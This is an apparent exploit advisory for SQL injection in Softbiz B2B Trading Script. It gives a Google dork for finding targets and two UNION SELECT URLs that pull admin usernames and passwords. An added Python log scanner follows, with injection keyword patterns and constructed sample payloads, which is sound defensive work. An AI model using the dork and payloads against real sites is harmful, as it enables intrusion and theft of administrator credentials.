[+] Softbiz B2B Trading Script SQL Injection Vulnerability
[+] Google Dork: inurl:cat_products.php?cid=
[+] Exploit:
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,char(58),sb_pwd),3,4,5,6,7,8+from+b2b_admin--
http://localhost/path/selloffers.php?cid=-1+union+all+select%201,concat(sb_admin_name,char(58),sb_pwd),+from+sbbleads_admin--
[+] Example:
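Added detection example (not part of the original advisory, and not Softbiz code): a Python scan of web access logs for abuse of the `cid` parameter on the scripts named above, including double-encoded input. It assumes combined-format log lines and that a legitimate `cid` is a plain positive integer; the sample log lines and the names `col_a`, `col_b`, `tbl` are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Scripts and parameter named in the advisory (assumption: cid is a positive integer).
SCRIPTS = ("selloffers.php", "cat_products.php")
PARAM = "cid"
SQL_TOKENS = re.compile(r"\b(union|select|concat|from|char)\b|--|0x[0-9a-f]+", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP range, placeholder names).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /selloffers.php?cid=12 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /selloffers.php?cid=-1+union+all'
    '+select+1,concat(col_a,char(58),col_b),3+from+tbl-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /b2b/selloffers.php?pg=4'
    '&cid=-369%2520union%2520select%25201 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?cid=1+union+select HTTP/1.1" 200 512',
]

def inspect_url(target):
    """Return the reasons a request target looks like injection, or []."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(SCRIPTS):
        return []
    reasons = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != PARAM:
            continue
        # parse_qsl decoded once; decode again to catch %2520-style double encoding.
        decoded = unquote_plus(value)
        if not re.fullmatch(r"\d{1,10}", decoded.strip()):
            reasons.append("non-integer cid")
        tokens = sorted({m.group(0).lower() for m in SQL_TOKENS.finditer(decoded)})
        if tokens:
            reasons.append("sql tokens: " + ",".join(tokens))
    return reasons

def scan(log_lines):
    """Yield (line_number, reasons) for each suspicious access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        reasons = inspect_url(match.group(1)) if match else []
        if reasons:
            yield number, reasons

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, reasons)
```

The integer check on its own is the stronger signal; the token list is there to help triage a hit.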